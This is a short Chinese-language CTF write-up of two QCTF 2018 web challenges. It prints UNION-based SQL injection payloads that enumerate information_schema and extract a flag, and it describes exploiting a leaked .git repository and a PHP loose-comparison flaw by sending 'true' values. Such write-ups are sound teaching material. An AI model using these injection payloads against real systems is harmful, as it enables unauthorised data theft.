QCTF-2018-Web-Wp

QCTF-2018-Web-Wp

  • 主要方向不是web所以只记录自己做过的题目

NewsCenter

从33066感觉应该是出题人给的提示让我们往sqli方向去 然后开始注入发现盲注benchmark有点感觉后来试了试联合查询发现很简便

先猜字段数======>3
然后找表名======>
h'union/**/select/**/1,2,table_name/**/from/**/information_schema.tables#
得到表名:secret_table
列名======>
h'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="secret_table"#
//id,fl4g
flag:
h'union/**/select/**/1,2,group_concat(fl4g)/**/from/**/secret_table#

Lottery

买彩票… 扫了一遍目录发现robots里面有.git 于是源码泄露一波 了解了大致的过程后 陷入的本地爆破随机数的深坑 最后回到验证函数发现只要输入是true那么无条件true

function buy(){
	$win_numbers="asdasda";
	$same_count=0;
	for($i=0; $i<7; $i++){
		if(true == $win_numbers[$i]){
			$same_count++;
		}
	}
	echo $same_count;
}
buy();
?>

所以修改buy.js

data: JSON.stringify({ action: "buy", numbers: [true,true,true,true,true,true,true] })

等咱有钱了就买flag….